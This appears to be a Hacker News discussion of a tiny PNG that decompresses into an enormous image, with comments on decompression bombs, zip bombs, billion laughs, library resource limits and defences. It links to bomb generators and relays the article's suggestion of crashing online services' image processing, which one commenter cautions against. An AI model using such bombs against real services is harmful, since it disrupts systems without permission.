
Biggest image in the smallest space - fekberg
https://www.bamsoftware.com/hacks/deflate.html
======
michaelmior
Actually, it decompresses to a 5.8MB PNG. However, many graphics programs may
choose to use three bytes per pixel when rendering the image and because it
has incredibly large dimensions, this representation would take up 141GB of
RAM.

~~~
jerf
One of the rules of secure programming is that any program that is used in an
even remotely security-sensitive context, and anything displaying a Portable
_Network_ Graphic is likely to be used in such a context, must be able to
specify resource usage limits. In this case that could be dimensions or a
limit on the total RAM allowed to be used. Limits need not be hard, either,
but could produce a query, for instance, the way very long-running scripts in
the browser ask you if they should continue.

Now, go find an API/library for dealing with PNGs that allow you to pass in
such a limit, let alone pass in a callback for dealing with violations. Go
ahead. I'll wait.

(The Internet being what it is, if there is one, someone will pop up in a
reply in five minutes citing it. If so, my compliments to the authors! But I
think we can all agree that in general image APIs do not offer this control.
In fact, in general, if you submit a patch to allow it, it would probably be
rejected from most projects as unnecessarily complicating the API.)

This is the sort of thing that I mean when I say that we are so utterly buried
by insecure coding practices that we can't hardly even perceive it around us.
I should add this as another example in
[http://www.jerf.org/iri/post/2942](http://www.jerf.org/iri/post/2942) .

~~~
userbinator
_Now, go find an API /library for dealing with PNGs that allow you to pass in
such a limit_

The article itself links to
[http://libpng.sourceforge.net/decompression_bombs.html](http://libpng.sourceforge.net/decompression_bombs.html)

 _These new libpng versions do not impose any arbitrary limits, on the memory
consumption and number of ancillary chunks, but they do allow applications to
do so via the png_set_chunk_malloc_max() and png_set_chunk_cache_max()
functions, respectively._

~~~
jerf
Now, go check your bindings, too. Often binding authors consider these
incidental and unimportant and don't expose them.

------
DanBC
That's impressive. Here are some other compression curiosities.

[http://www.maximumcompression.com/compression_fun.php](http://www.maximumcompression.com/compression_fun.php)

A 24 byte file that uncompresses to 5 MB; another file with good compression
under RAR but almost no compression under ZIP; and a compressed file that
decompresses to itself.

~~~
Filligree
I'll add mine: [https://brage.info/hello](https://brage.info/hello)

It's a 1MB file that decompresses to 261 tredecillion bytes of "Hello, World".

No terribly clever stream manipulation; it's a perfectly normal gzip file,
other than the size. The generation script is here:
[http://sprunge.us/VhFc](http://sprunge.us/VhFc), but see if you can figure it
out without peeking.

~~~
kuschku
Actually, it decompresses into a 1.4MiB file, which decompresses into another
1.4MiB file, recursively.

~~~
Filligree
I sized it to fit on a floppy disk. :-3

But, no. There's a finite number of levels, and it blows up pretty quickly.

------
0x0
That's neat, but I still think the self-reproducing r.zip from "zip files all
the way down" is the best compression trick I've seen:

[http://research.swtch.com/zip](http://research.swtch.com/zip)

~~~
dmit
There's also dynamic generation of output by specifying a custom filter in a
RAR archive that is executed during decompression:
[http://blog.cmpxchg8b.com/2012/09/fun-with-constrained-
progr...](http://blog.cmpxchg8b.com/2012/09/fun-with-constrained-
programming.html)

------
__mp
Photoshop was able to show it:
[http://i.imgur.com/7EdBySv.png](http://i.imgur.com/7EdBySv.png) (Macbook Pro,
16GB RAM)

~~~
userbinator
Photoshop is an example of a graphics program that doesn't attempt to read the
entire image into memory.

How much RAM did it actually use?

~~~
__mp
Difficult to say. I don't completely understand the activity monitor RAM
column: [http://i.imgur.com/QS3NPQQ.png](http://i.imgur.com/QS3NPQQ.png)
Looking at the activity monitor details we see that it uses something in the
order of 2.54 GB of real memory. I suspect the rest is mostly compression.

------
semi-extrinsic
If you follow the "related reading" link on the bottom of TFA, you come to a
page by Glenn Randers-Pehrson discussing how libpng deals with decompression
bombs. On the bottom of that page you find the following curious note; anyone
know what to make of it?

""" [Note for any DHS people who have stumbled upon this site, be aware that
this is a cybersecurity issue, not a physical security issue. Feel free to
contact me at <glennrp at users.sourceforge.net> to discuss it.] """

~~~
saalweachter
He's presumably had problems with people confusing "decompression bombs" with
the blowy-up kind and sending him panicky e-mails.

~~~
cperciva
Another possibly apocryphal case of linguistic collisions resulting in
governmental interest: When the MIT Media Lab started doing work on
intelligent kitchen counters, they found that a lot of shadowy government
agencies wanted to talk to them about their research into "counter
intelligence".

------
wiredfool
PNGs also have optional compressed text metadata chunks, and it's possible to
sneak a decompression bomb into one of those as well. You can get about a
factor of 1000 in the compression -- 1MB of 'a' winds up being about 1040
bytes. You can have multiple itxt chunks, and it appears that the chunk size
is only limited to 2^31-1.

See [https://github.com/python-
pillow/Pillow/blob/master/Tests/ch...](https://github.com/python-
pillow/Pillow/blob/master/Tests/check_png_dos.py) for a quick way to generate
some of these.

------
andersthue
Reminds me of how you could crash a fido node by sending them some big empty
files, so when they got automatically unzipped the filled of the harddrive :)

~~~
fizgig
I think this kind of thing was common even a few years ago in DoS'ing mail
gateways that uncompressed and scanned various archive formats. Things like
really huge files when uncompressed or ridiculously deep nested directory
structures.

I think most software these days is immune to such tricks, or at least has
tunables to reduce the chance of such tricks causing harm.

~~~
digi_owl
Zip bombs, a relative of the fork bomb.

[https://en.wikipedia.org/wiki/Zip_bomb](https://en.wikipedia.org/wiki/Zip_bomb)

The billion laughs XML attack is also lovely in its simplicity.

[https://en.wikipedia.org/wiki/Billion_laughs](https://en.wikipedia.org/wiki/Billion_laughs)

~~~
Koahku
I was doing a presentation about various bombs last year and crashed
PowerPoint by copy-pasting billion laughs in a slide. Simple but extremely
effective.

~~~
digi_owl
Not sure what is worse: that MS has Powerpoint interpreting randomly pasted
XML, or that they do not have handling for excessive memory usage beyond
crashing the whole program.

------
eli_gottlieb
[http://jeremykun.com/2012/04/21/kolmogorov-complexity-a-
prim...](http://jeremykun.com/2012/04/21/kolmogorov-complexity-a-primer/)

[http://c2.com/cgi/wiki?KolmogorovComplexity](http://c2.com/cgi/wiki?KolmogorovComplexity)

Here be rabbit-hole.

------
inglor
This does wonders when used in favicons :D

~~~
raffomania
I just tried it on a locally served page, and my browser handles it quite well
(although it won't really display it).

~~~
inglor
Only on firefox and chrome since they fixed it
[https://github.com/benjamingr/favicon-
bug](https://github.com/benjamingr/favicon-bug)

------
raffomania
Fun fact: When trying to upload this as a profile picture (on a site I host
myself), chromium crashes.

------
dahart
Having dealt with and printed a lot of _very_ large images, e.g., 60k x 60k
pixels, I have been on the lookout for image processing software that never
decompresses the entire image into ram, but instead works on blocks or scan
lines or blocks of scan lines, but stays in constant memory and streams to and
from disk. For example, the ImageMagick fork GraphicsMagick does a much better
job of this than ImageMagick. What other software is out there that can handle
these kinds of images?

~~~
phkahler
The key is not to store it in raster form in RAM. Either tiles (like GIMP) or
I prefer Z-ordering. Then a user can zoom in and pan around easily - you let
the system swap and it won't be bad at all. If they zoom out though, you
probably want to store MIP maps of it.

Swap works well for this as long as your data has good locality. huge raster
images don't.

But no, I'm not aware of any software that handles stuff like that well -
except the GIMPs tiling, but that's not going to help when zoomed out.

~~~
dahart
What does Z-ordering mean in this context?

I definitely want to avoid swap at all costs and find things that are designed
to tile & stream instead. The difference between GraphicsMagick resizing an
image by streaming and ImageMagick resizing an image that hits swap is orders
of magnitude - seconds versus hours.

~~~
phkahler
>> What does Z-ordering mean in this context?

You divide the image into quarters and store each quarter as a continuous
block of memory. Do this recursively.

Normally we'd index into the pixel data using pixel[x,y]. You can get
Z-ordering by using pixel[interleave(x,y)] where the function interleave(x,y)
interleaves the bits of the two parameters.

This works fantastically well when the image is a square power of two, and
gets terrible when it's one pixel high and really wide. I think a combination
of using square tiles where each one is Z-ordered is probably a useful
combination.

For my ray tracer I use a single counter to scan all the pixels in an image. I
feed the counter into a "deinterleave" function to split it into an X and Y
coordinate before shooting a ray. That way the image is rendered in Z-order.
That means better cache behavior from ray to ray and resulted in a 7-9 percent
speedup from just this one thing.

Once you have data coherence, swapping is not a big deal either in
applications where you're zoomed in.

~~~
tripzilch
> You can get Z-ordering by using pixel[interleave(x,y)] where the function
> interleave(x,y) interleaves the bits of the two parameters.

That is pretty cool (also the raytracing application), but most surprising to
me, is I remember the interleave operator from reading the INTERCAL[0] docs
... I never even considered the function could actually be applied to
something useful :-)

[0] one of the early esoteric programming languages, designed to be "most
unlike any other language". It also features a "COME FROM" statement (because
GOTO is considered harmful), which iirc also actually has a parallel in some
modern programming paradigm.

------
AndrewStephens
I used to work on a scanning SMTP/HTTP proxy and even back then it wasn't
unknown for people to send crafted decompression bombs to attempt to crash the
services. We handled it by estimating the total uncompressed size upfront
(including sub archives) and throwing out anything with a suspiciously large
compression ratio.

I imagine that .pdf files are another avenue for mischief. They contain lots
of chunks which may be compressed in varying ways.

------
tetrep
Neat. I needed to make very large PNG bombs recently and toyed with the idea
of doing it "manually." In the end I decided to take the lazy route and use
libpng[1].

[1]:
[https://bitbucket.org/tetrep/pngbomb/src/03dfc95065d78562c15...](https://bitbucket.org/tetrep/pngbomb/src/03dfc95065d78562c156c056abc3d5f1fd7047b8/pngbomb.c?at=master)

~~~
x0
This works wonderfully! With an image size 123456x123456, I made this happen:
[http://i.imgur.com/2Dgrazj.png](http://i.imgur.com/2Dgrazj.png)

I killed it at about 25GB memory usage, who knows how high it would have
climbed otherwise.

------
JosephRedfern
That's cool. Presumably the same "attack" could be applied to any file format
that uses DEFLATE.

From a legal stand-point, I'd be wary about following through with the authors
suggestion of "Upload as your profile picture to some online service, try to
crash their image processing scripts" without permission. Sounds like a good
way of getting into trouble.

~~~
atom_enger
What about responsibly disclosing the bug you found with steps to reproduce,
the impact and the solution? As long as you only timed out the backend without
entirely crashing it, I can't imagine any sane company would prosecute you for
trying to improve their service with this level of detail.

~~~
JosephRedfern
How do you know that you're only going to time out the backend without
entirely crashing it, without actually attempting it? It's a kinda
Schrödinger's cat scenario.

It's all good and well saying that you had good intentions, but if you can't
prove it, and they didn't invite you to test it (via a responsible disclosure
policy), then I would steer clear.

While I wouldn't personally attempt to prosecute anyone for responsibly
disclosing a bug to me, it doesn't meant to say that BigCorp™ wouldn't.

------
logicallee
>The image is almost entirely zeroes, with a secret message in the center.

too pressed for time, did anyone look? What is it?

~~~
sgdread
It is "SORRY, OUR PRINCESS IS IN ANOTHER PIXMAP"

------
tiler
I realize that this is besides the point but going on the title alone we could
write a script that could generate an 'infinite' (max out available memory)
sized image.

------
javajosh
Everyone's focusing on this being a PNG problem but actually if my server
unzips a 420 byte file into a 5M file of any kind, I'd say that's the first
red flag. Assuming some sort of streaming decompression, you could write an
output filter that shuts off the decompressor when it's seen a factor of X
bytes. A reasonable factor would be 10 - which in this case would have halted
bzip decompression at 4kB.

This would probably be a trivial patch to bzip2. But I like the idea in
general of passing an "max input/output ratio" to any process or function that
might yield far more output than input.

~~~
ctdonath
The real problem is image handling libraries that blindly render images into
too-large objects where unnecessary. While full-res uncompressed images are
very convenient under the hood, the image library should inherently handle
anything "too big" gracefully. Instead we're often prone to apps crashing when
someone feeds in a ridiculously large image.

A 420B > 5MB expansion should not be a "red flag" because there is nothing
about it (including the subsequent attempt to process a 141GB uncompressed
image) which cannot be handled appropriately in software. Flagging such ratio
limits is arbitrary, and setting an arbitrary limit is usually a sign the
software is incorrect, not the data.

~~~
javajosh
A ratio limit is a hueristic.

There _is_ an upper-limit to how much _information_ you can compress into a
given space. (Note that we may want to write a pathological program that is
very small and allocates a lot of information-free memory. But that's not
decompression.)

If we accept the premise then we can look at another approach to solving this
problem, once and for all! I like examining memory allocation because it's so
general. But there may be another way. We can examine the input to estimate
compression ratio.

The problem here is that image decompression is apparently giving strangers
the ability provide an arbitrary N and say "Please loop N times and/or
allocate N bits". A modern CPU is overwhelmed by an N 12 bits long or longer.
This is a root cause of many problems! You know, I'm going to go out on a limb
here and make a bold assertion: I assert there is a very safe upper bound on
the decompression ratio, and that for any real algorithm _you can indeed
examine the input to determine whether N exceeds your allowable threshold_.
10x might be a bit low (although I doubt it) so let's be generous and say
100x. (Which seems crazy. Nothing that I know of, not even text, compresses
that well.) This means that I believe that any image format, for example, has
a trivially calculable N (for example, width*height in pixels). I would argue
that in the general case (unless you are doing some sort of compsci research)
the image file should be related to N. That is if the image is 10 bits wide,
10 bits high, we should expect a roughly 20bit file-size.

------
ctdonath
Looks handy for large image processing tests, thanks.

------
atom_enger
Trying to run the program and create my own image, however a few questions,
what did you use for secret.png? Any old png?

Are you using PIL or pillow?

------
pvdebbe
Cool, but most web sites wouldn't allow to upload a 5-MB picture as a profile
picture. Or do they, these days?

------
andrewstuart
Is there a way to check for decompression bombs? I'd like my software to be
able to unzip zip files safely.

~~~
ZenoArrow
Monitor zip files as they decompress. Halt decompression process if the size
ratio between zip file and decompressed file exceeds a fixed ratio (for
example, if ratio between the file sizes is something like 10:1).

~~~
Ambroos
If you do that, pick something a little more extreme. When using BEM, for
example, your CSS becomes pretty repetitive and you easily get better than
10:1 ratio with GZIP, for example.

------
ak2196
It's probably using middle-out.

------
TurplePurtle
I wonder what the ratio would look like if the equivalent was done with a JPEG
instead of a PNG.

------
mridulmalpani
does anybody tried to upload it on facebook as profile picture?

~~~
MrKristopher
"Your photo couldn't be uploaded due to restrictions on image dimensions.
Photos should be less than 30,000 pixels in any dimension, and less than
41,000,000 pixels in total size."

------
hnpc123
The title was changed and is now more opaque and less descriptive.

~~~
fekberg
Yeah, I agree. The original title was a lot more descriptive.

~~~
dang
The original title is the one the author gave it. The HN guidelines ask you to
not to change that unless it is linkbait or misleading.

~~~
fekberg
Ah yes, of course. Thanks, I'll keep that in mind for the future!

------
_hhff
righto pied piper

------
hadeharian
This is a very easy form of attack in security circles.

